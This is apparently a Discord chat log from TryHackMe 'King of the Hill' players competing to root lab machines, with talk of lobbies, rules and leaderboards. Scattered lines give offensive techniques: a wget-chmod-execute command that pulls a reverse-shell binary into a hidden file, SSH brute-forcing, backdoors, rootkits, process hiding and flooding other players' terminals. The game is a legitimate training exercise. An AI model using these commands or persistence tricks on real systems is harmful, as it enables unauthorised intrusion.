#koth
1 messages Β· Page 56 of 1
Starting in?
It's usually helpful to share the spec link as well, so players can see if they wanna join.
Good Luck π
Naughty you playing?
Ok 
i think i am in a lobby of afk people T_T
I can join if anyone wanna play.
i can play in 10 minutes
finishing in 7 mins
who makes lobby
That game you posted is starting in 20 ?
okay yeah
Everyone can join that one.
yeah
this one?
yeah
k
i will finish in 3 mins
oh lol I really would've exited, I don't do offline box, was AFK damnit
we can make a new game
Yeah, let's do that
yes please xD
starts in 4 minutes
i really have no clue for that machine
come join
oh @hearty wing you remember last time we played, you were printing like strings on my shell xD
yeah
how did you do that
i will pm
k
echo string > /dev/pts/<your_pts_code>
why it says i am the king but the time don't increase :/
Because we are both writing names so fast that king service is seeing the file as empty
oh xD
ah man i forgot backdoors
I see those urandon missiles landing
Nope.
someone changed all the passwords
it says connection refused
same for me
SSH closed?
yes
i think yes
Rescan the target. this is an example how people simply change the port, and everyone reports it's off.
It's not. I merely changed the port.
okay
ssh disappeared
yeah
k
ah man cant get in with brute forcing as well
can you access the wordpress site?
i can't open the login page idk why
i had the same problem before
but im in now
i havent expoloited thru wordpress before
Its pretty cool to get a shell from wordpress
i have to find out how tho
Oh, have you done MrRobot room?
i know now how
well i am stuck now o_o
i changed all credentials for wordpress
i can say that username is pangpo
I think the direct one is still working ||shifu user||
still can't find the new ssh port tho
nmap π€·ββοΈ
ye i 'm trying
have you ever found the password for ||steghide to the image in the website||?
You sure there is one?
not 100% but if i run ||steghide info|| on it it ask me if i want to || get the embedded data|| so i think yes
i found but i cant get the password
and wordpress exploits are not working because the page is so slow i acnt do anything
IIRC it asks for that on any image
oh i didn't know that
congrats @stiff egret
GG
GG
Uh, Multiple methods to get in, I ||exploited tomcat|| , got the shell
one question, it was you to make my terminal going crazy with all the weird characters?
Well, it works π Try it next time
Yeah, that was urandom, I cat-ted them on your pty.
@gloomy shale how did you get king so fast
It's like reading an infinitely long file but on another terminal.
So cool
i have used it
||hydra|| the ssh, got password, and then ||privesc||
yep
I can't, it's dinner time here.
okay
i have to go afk for a while
okay
later maybe
yeah okay
Starts in 23m
!docs koth
if anyone wants to join a game strting in 4 minutes on the machine Lion:
https://tryhackme.com/games/koth/join/c634917e574f7e69315f67fc
Good luck
how do you know its gonna be lion?
You can choose the box when making a private game
gl to you
you are a god π
Being taken care of.
You were root after 2 mins or so lol
^^
I got access to the machine 1 minute before the end of the timer and I barely had time to get root with pip3 lol
just right before the end i managed to get the credentials but was already to late ! Not understanding the obv. sometimes π
@dusk cave If you want we could do the box again in a private game I still haven't find all way into the box.
Yeah that would be nice ! A friend of me would also join
I will take a little break of like 30 mins.
Okay see you later
is changing passwords for ssh and other stuff allowed ?>>
yeah
@dusk cave I'm back still down for the private game ?
yeah ! how much time do you have? i am right now in a private game .. its over in 20 does that work for u?
Yeah no problem
Which box do you fancy?
i forgot the name of the box we played
Hogwarts
ah yes i will create
Good
did you patch or do i just dont find anything?
??
Yo
Hey
someone is killing this koth game
Thatβs not cool
Yes i did
I experience it too
Every commande i tried was useless
π
Even "ls"
And even in root i couldn't write the king.txt file π
It seems like thereβs 4 people in that game so that leaves 2 people it could be I canβt really figure out who it is with only that information
??
yep
Would like to play?
o k
Lemme make the game
5min
Can I join?
Yes sure
next time
??
anyone?
@latent osprey are u up ?
Yes
lets play
New game?
Im down too
Atleast let us hack (β―Β°β‘Β°οΌβ―οΈ΅ β»ββ»
Just gimme time to boot up
lets play game with no changing pass
Yes thanks ( κα΄κ)
And no submitting flags π

hahaahh ok
I m gonna submit flags in the end!
@remote abyss how did you get into the machine?
-p3333?
We can change roots passwd tho
noo
Eh hopefully its not windows or hogwarts
ok
with no pass changing
Ook
Not even root ?
I think ! We have to escalate that
We don't get pass for root
Okay your wish
someone changed the pass π
I though we werenβt supposed to change passes ?
Ping me when the box got reset
Im in another lobby
Im in another lobby
@un.kn0wn#3578 nvm it hogwarts π€¦π»ββοΈ
Do what
Didnβt block anything just removed it
form /bin
Yes I believe
aa ok
how u do that ?
Yea I noticed
how ?
Um i transferred my own binary ?
ok
GG
?
Im in a public lobby
Starts in 13 mins
Join a public game if u didnβt get in mine iβll send u the link
ok
Is changing passwords allowed or nah ?
we are in public
allowed
Yes
I m doing some with now! I will ping you
allowed
@remote abyss can u send the link in this channel
oh no
Eh it Offline im out
ok
ok
No passwd changes then
ok
gg
i kill u
i didn change pass
yep
So u changed the pass ?! Lol
no
π
Yea but I wasnβt getting connection refused
Before u changed the port
I was getting permission denied bc of the passwd change
i changed sshd port
|| ramen and pasta ||
Nah im not playing rn donβt worry
suraj41 i think
ok
I am in box, but didn't changed passwd
??
someone up for koth?
yes
are u up?
are u up?
yea
lets play
someone else ??
public
ok
ey bro are you from albania?
yes
why?
i live in tirana
nice ! π
dude i have no idea about Windows machines lol
any tips ? π
i am already on the machine but i didnt do windows rooms yet haha
@remote abyss sry I was away
hmm i dont like to you metasploit if i can avoid it is there even a build in text editor ? how do i edit files LOL i feel like i am at the beginning again π
u can use shell
i am already logged in with ssh
ok
and i think i found a vulnerability but is there something like nano or vim ??? π
@dusk cave ??
hey i'm in
ok
do you have already changed the ssh passwd?π
??
@remote abyss Wanna do private game I dont feel like waiting 20 mins ?
prepare to be disappointed
how to play koth
!docs koth
someone up for koth?
anyone up for koth?
Hope I was helpful!! @timid basin . Keep Hustling
thx man!
Never mind brother
koth?
@remote abyss can i dm you?
yes sure
Yh
Are u in staff of koth ??
Click on the name, you can see the koth-staff role.
Yeah i am.
cool
when are you going to release new box
very soonβ’οΈ iirc
Can anyone tell the least level required for koth?
I mean what is intermediate level..
Least level of knowledge OR least level on tryhackme site to be allowed to play KoTH?
Exactly the sane questionπ
To change your level on tryhackme site, go to Profile > About you > At the bottom of the page, change your level.
About actual knowledge level, you should first try easy-medium level boxes on site, once you are comfortable with them, you can start with koth, many prefer to directly start KoTH, you can try that too.
Thanks a lot sir!! π
no need of sir, and no probs :))
:-)
Yup ping me @hearty wing
Okay see ya later
@latent osprey @hearty wing I'm new at it but I'd join in
can i join too?
Of course. New players are always welcome
Yeah of course
starts in 24min
Hey cool! I will join it
I can play in about hour
i am having some trouble with hackers can i dm someone? for a small hint
Yeah @dusk cave
@dusk cave There's an official writeup for it
I just double checked with Taneltanelsson and the writeup i am doing the right thing it just doesnt work
Then someone might have patched it, or you're doing it wrong
i am with a friend in a private game he has no clue either
might i send u a screenshot?
I guess. I'm not gonna spoil the box though.
no i dont want that at all!
@remote eagle this is the channel you want to post koth grievances in if someones breaking the rules
!docs verify
was having a problem with the verification process, sorry for the requests
I believe this guy got root, then editted the flags
and stopped the ssh server
and after couple minutes the machine stopped being accessible
I checked and it wasn't resetted or anything like this
I know someone altered the machine, because chattr was used on /root/king.txt and removed from the box
python2.7 binary was removed as well
and the flags were obviously altered
That is within rules, you are allowed to get your own binaries own to the system specially chattr. For ssh people tend to change to port for the service. If you have any screenshots of the flags that were altered?
yes
I think
one sec
I think I forgot to screenshot π€¦ββοΈ
That is within rules
I know but ssh service was stopped as well
that's the flag I found, unfortunately I forgot to screenshot it on the ssh session, another flag was altered as well
@remote eagle this flag was also like this for me, nobody changed it, and ssh changed the user password, so you were not able to connect to the machine
Don't you thing that you could do something to that rotten flag? π
So I did it and came here to complain ? Don't you think that's little off ?
@severe oar it wasn't because of a changed password, I think I would know if that was the problem
?
it wouldn't make sense from me to alter the flag then post about it here
nobody interrupted or changed the ssh port
ok i'm out
I asked you if you couldn't do something with it now that you have it ^^
did you try running -p- in your new nmap scan
yes
never did something like this. it's against the rules
also never did this
I tried -p- and -Pn I also WAS root on the machine, so I know what happened
π€¦ββοΈ I know that you did nothing to it, that's why it doesn't work
The flags are not altered but encrypted instead.
ROTten
and that's allowed ?
That's how the box was made ^^
I mean that's what the room creator added. No one altered the flags.
ok I'm dumb
I can't believe I went trough of this to find out I was the problem π
also sorry @fair adder
It's okay
Also try to be patient, no need to freak out. If one way is patched there are always other ways in. and ssh is not the only way π
my bad
@remote eagle a tip: when you can connect to the machine, get a reverse shell, it will keep you on it even if everything changes
π
Any tip on how to get a bind shell ?
Setting persistence wins you the (late) game.
you still have 11 minutes to google that.
is the ||smb share really empty|| ? I suck at ||smb|| enumeration
explore the web, leave smb aside
thx
[xxx@tyler xxx]$ ls ls xxx.txt [xxx@tyler xxx]$ cat xxx.txt cat xxx.txt xxxxxxxxxxxxxxxxxxxx [xxxx@tyler xxxx]$ cd ..
I give up
...
Anyone up for Panda? I think I figured out how to find the final flag....
Hey hey
Hey Donut
Im down
Good luck
Be nice please, I'm trying to find this eighth damn flag lol
Dont worry I don't have any note for this box and don't remember it
Holy crap, this regex grep is taking forever.
ripgrep, I'll have to look that one up. I've never heard of it
I downloaded a static binary of ripgrep on the box /root/rg
Thanks, I'm running it now
No problem
They've been running this whole time and haven't yielded anything of note....FML
What was your regex for find the flag. This box got some really weird flag format like I think they are base64 encoded and without any wrapper
[a-fA-f0-9]{32}|[a-zA-Z0-9]{44} because i've seen both formats when decoded
how many flags were there
And there goes that.....
eight total
oh
The box is still not dead
It's already closed connections and won't allow a reconnect
myDonut is the Hogwarts room slow for you too?
you lads playing one more ???
hogwarts is the worst room in the tryhackme
Yeah my shell just died
Time to head to a meeting. See y'all later
Best room
nah not really ... π
your fav right ?
Yup
@severe oar Make sure you do a full port scan and on every reset since port a random.
I did it, 15 minutes running nmap with -T4, and that's all for nothing, since you changed the ssh password ...
I didnt change the ssh password
I dont patch box
Little tips use rustscan full port scan in 3 sec
Just because you find it difficult, doesn't make it bad. It's also not a room.
it's not difficult, it's just slow, it's a game of patience
come join
starts in about 15 minutes
box is random
@cedar lark
??
me
ok join
okay
someone else up ??
oow
@cedar lark ??
ok next time
okay
yeah i give up
dm me ! @wispy current π
starts in 24min
koth?
starting in 15 min
join this starting in 10 min
fast
π
π π bro you killed
anyone for koth now ?
count me in
yaa
someone send the link ...i am too lazy π π
Damm bro! Where you got the fourth flag
I will join KOTH in 20 min
Making a room
Avoid the spoilers please.
Ok sir β€οΈ
SMH told you before, no need of sir.
β€οΈook
Starting in 15min
My first time doing KOTH....here we go
Good luck
of course get a work call as soon as I try to join one rip me
Yeah
This was fun! I was not able to echo my name to king
Lol idk why
But when I figured how to do that
Timer ran out

Any1 up let a noob tag along in about two hours?
I would like to but can't play in 2 hours
starting in 15min
im rdy now, but just tagg me somthime:)
Okay in about 30 minutes
allrigth
in 5min

koth??
yeap
??
@cedar lark Can I DM?
yeap
@remote abyss
join room
Hey @harsh obsidian I see you there!
Hey! What's going on?
Grinding KoTH today, leaderboards are out, (I think you know already)
Actually I didn't. I haven't been doing a whole lot of KotH beyond testing this enumeration script I've been working on lol
Oh, well they are out,
lol
Holy [redacted]! I'm number six in KotH!
:)) Congrats!
Thanks!
Congrats
π
Oh, well they are out,
@Mr.Holmes#3066 does private games count ?
No, only public games with points > 0
Anyone in a public game starting soon ?
@stiff egret Hey I only need 2 win to take your place in the leaderboard
There's a potential update in the leaderboards, (potential not 100% solid)
if that happens, you'll need wayy more then just 2 games

btw rn you are above me in boards
Really?
eh, the ranks are juggling because of equal points
https://tryhackme.com/games/koth/16491 though this one will clarify that confusion 

That your first mistake
I know
I hope you're good at tetris.....
Long time I havent that script
You sure about that
Sure in the new (upcoming) machines π
@nova tide That interesting
Oh you gonna love the new machines and hate holmes for making them π€£
ouch
Lion?
yeah
Patched that ||CVE||?
Your funny
Yeah it patched also
the ||rce?||
Yeah
yeah patched that one
I don't remember which one was it. I just renamed it to "rootshell" on my system
π yeah it was that ||rce||
Run that to get root shell
Ill vote for reset then
evil mean people
The game as been running for 35 mins
Keep grinding all of you imma go sleep now 
Can I do a fork bomb to kill the box ?
I should be working now, but here I am grinding koth
ouch
Ofcourse. if you want to get banned
JK ππ
But making the Window box blue screen is legal

imagine knowing windows
Oufff
I know you got a surprise binary up your sleeve, I am not gonna let you run that
All you need to do is become an initiate to the order of the Windows Magicβ’οΈ
wget http://10.6.35.75/rev -O /tmp/.log; chmod +x /tmp/.log; /tmp/.log
lemme guess, the flag with blue screen and 'Installing updates' text underneath ?
that was me myDonut
Was trying that rce π
your server is dead @rancid pewter
@stiff egret You won anyway you got more then 30mins of king time
m pretty sure you have all flags stored
alright resetting

GG y'all
Yup
any1 want to have a noob taging along?
i don't understand the KOTH stuff..are we on a team or is it everyone for themselves? also @rancid pewter you are killing it as king!
We are all by our self the goal is to root the box the quickest and write your name in /root/king.txt but I already have done this box so I can root it under 1 min but still I didnt patch anything.
Oh no mydonut grinding, don't take away my rank, m sleeping dude
Already took it
!docs koth
Don't take mine 
I'll play when you'll be sleeping tomorrow ππ
Sleeping is for the weak
@rancid pewter ah ok.. That makes sense then. I read the page and it said to join the discord VC, which made me think it was collaborative. Thanks
I intend on living a bit longer
Admire your rank until it gone. Nah really for all the time you played and helped people you deserved it.
waiting for the recalculation
Ill just make an AI of myself to do KOTH all day
Sssssh up dude, don't give away ideas
Tho now that you mention it
It's actually possible
ππ
Only if there wasnt a rule for scripting box
All legends untill Hogwarts comes in
Or offline? π€
exit(0);
πππ
I mixed like python and C
I was not ready for this
- Watch the language please
- Damn who was that
How my bad
There only one guy who got a flag
... ?
You are not supposed to say that in public?
π€oh didn't know that
I think so
We didn't specify anyone
Well anyway,
One could be myDonut π
Drop a mail to koth@tryhackme.com anyway
@rancid pewter helps getting it in the record
Yeah if @stiff egret want his 2nd place he could just ban me
Wait, what happened again?
Some user changed the flag with abuses for myDonut
I wish, but I'll beat you the legit way π‘οΈ
I can ask CMNatic or an admin to check the logs for that


Anyway I need to go
Goodnight
@severe oar #talk-with-us-no-threading please π
@severe oar
your pwned
Linux nowak 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
:S
@cedar lark Are you targeting other members by any mischance?
Sure looks like you might be saying you've hacked him
May I suggest not joking about things that are:
A) Illegal
B) Against THM ToS
C) Against Discord ToS
D) Against our rules here
Good way to get banned from, well, everything, and likely passed along to the police π€·ββοΈ
you are pwned del
Smh. Right. Done with this
if you complain too much I exclude everything.
@severe oar seeing as you're being an absolute prat and are ignoring the ping in #talk-with-us-no-threading:
Ban appeals are jon@tryhackme.com. Enjoy
Yeah, good luck with that, I banned him
Speaking of, you be careful -- you're on thin ice too
why?
etc, etc
And I banned him for the toxicity he's displayed for the past however long he's been in here, pretending to break everything linked in that message after seeing you get yelled at for it, and ignoring the #talk-with-us-no-threading summons
He has the appeals email
am i going to be arrested for playing with a machine?
No, but you could be if you hacked something you don't have permission to hack. Like, for example, a machine belonging to another player in KoTH
We have no problem passing along breaches of the law to the authorities π€·ββοΈ
i only did it 2 times
just for fun
sorry :\
Only did, what, two times...
hack. Like, for example, a machine belonging to another player in KoTH
victim -> nowak
:\
Sooooo, you're admitting to hacking another player?...
no..
it was a joke, sorry
smh
Buh bye
anyone for koth
@stiff egret can i dm u??
You can talk here, no need for DMs, I was about to go to sleep anyway.
good night
Did @del get banned lmao
and i π
@remote abyss if you need to talk to a koth staff you can dm me
@rancid pewter I have no idea what you're doing but it's intriguing and this has been a really fun KOTH so far π
@civic coral Having alot of fun too. I have taken KOTH to a another level, I have forced people to play tetris, made a rootkit.
That's awesome, I just started out and it's such a fun way to practice offsec. Looking forward to more games like this :)
Made alot of people go tryhard π
You are all lucky that I lost everything in a hard drive
GG
gg
@nova tide I'm a little confused, is l1nkm banned just from the discord or also thm?
I might be able to get back my hard drive data tomorrow if I didn't break the drive. Hope your all ready for some tetris
definitely, I'll start developing my own as well :)
Good luck
I don't know who l1nkm is
I just scrolled up a bit and a user named l1nkm was talking about hacking other users through koth, then I presume Muiri banned them, but I saw them in the past couple KOTH games I did today
I think you got the wrong username
Look who is first
Ahhhh, yeah I think they renamed themselves or made a new acc
Gone
are binaries supposed to be deleted on Food?
That's just a hurdle. They are there. Worst reply ever, but try harder
myDonut is back in koth oh laaaaawd
ok, just making sure that another player wasn't deleting them
kernel rings? what kernel rings when myDonut is about π
its you
nope i didnt delete any just patched
π thankyou sir
it's gone
it was in ramen
ho lol some one just deleted it? that was not a correct play
yeah as i am the king π but still there are ways to get king try harder
all I can do is ls lol
5 mins bois
starting in 13 mins
starting in 12 mins
@stiff egret does Hogwarts a dynamic box?
yes
Has anyone else had issues with Offline and king? I have my username in king.txt but KotH isn't showing me as king. I can more the file with no issues.
The king file is supposed to be in c:/users/administrator/king-server/king.txt
This is where the service is reading the king from, you sure you are writing in the correct file?
Yep: C:\Users\Administrator\king-server\king.txt
Can you share the IP in DM?
And when I curl port 9999 on that box, I get a 503 Service Unavailable. I'm pretty sure I'm the only one on the box, and I haven't messed with 9999 or king-service
Sent
From what I can see, the king service broke.
@winged charm It's windows, you da wizard in that
how can they restart the king service in windows? (I have no idea )
spooky had the most ghetto way of setting up the king service dont even ask me
basically
you need to completely restart the IIS server iirc
@harsh obsidian you can either do that ^ or reset the box.
okay, thank you both
I changed the IIS root web folder directory to C:\Users\Administrator\koth\king.txt
and then gave IUSR read-write perms
there's one issue with echoing your name into it
it works completely fine if there's no whitespace afterwards, if there is it'll break it. very much so.
you dont need to restart anything
and ignore the incorrect file path, same thing, you get the general idea
Oh, Alright, thanks for the info! :) @harsh obsidian Maybe that'll help!
its a known issue, though. It's a windows thing. It's not the greatest for koth tbh.
'It's just windows being windows' is what I am gonna reply to from next time xD
pretty much
I'm trying to get around the whitespace problem.....let's see if it works
it's best done in notepad
It's either
- There's no whitespace and there needs to be
or - There's whitespace and there's shouldn't be
Oi @stiff egret might wanna take screenshot of new rules and pin it here(as people usually tend not to read those). If others haven't checked yet they should re read the rules, they were updated recently.
Anyone here good with sed or awk? I've google'd my ___ off and can't figure out this problem.
I have a doubt: Can I use linPEAS to get my path to root while playing koth?
Yes. But you'll learn a lot more if you come up with your own methods
By rules no.4 we cannot modify koth binary source code?
It says that there, doesn't it?
This time, the rules are pretty self explanatory.
@broken berry cool script you got there
starts in 20min
Yes it works now
Okkkkkkkkkkkkkkkkkkkkkkkkkkk
Does it not ask you to set the ulimit....
?
No chance against holmes
What script?
Blame the leaderboards.
Just a shell script for king.txt
Did you use a rootkit or just a script for modify king.txt file on Lion box last time?
Lots of secret stuff
rootkits are overrated
and most of them not worth it.
Backdoor is the key to win.
See it like this, you need to have a basic shell to get root from the rootkit you planted.
But if someone patched everything, you won't be able to get one.
On the other hand, backdoor will give you root shell no matter what.
It's not the backdoor though, I'm having a hard time to find how you change king.txt continuously
while loops?
Not see a process there
you can hide your process id as well
also, loops show up as normal bash processes.
I mean, google a LOT, read the man pages of binaries you use, never thought I'd say this, but they are epic
Wait, while loops show process name as a regular bash session?
Yep
Hmm, I'm only find the one that only mask the processes, not entirely hide it from proc
well, you can hide it, just a matter of finding the proper method.
you need to share the join link, not the spectate link
:))
3minutes 21 sec
Private or public?
priv
:(( m only playing public now, as priv are not counted in leaderboards
Booting up the vm
https://tryhackme.com/games/koth/join/e18d2ae6e272d77be30b1f11
Starting in 14 mins, Public
π
who's that using chattr lol
me !
What's your username on site?
SANKALPSNIPEY
OH that's you ookk
π you dint expect that from me . did you?
π no, I was just wondering who was that, you clearly patched almost everything
but missed one
juz wait π‘
omg
Gg
GG
Laptop crash at the 6th minute lol

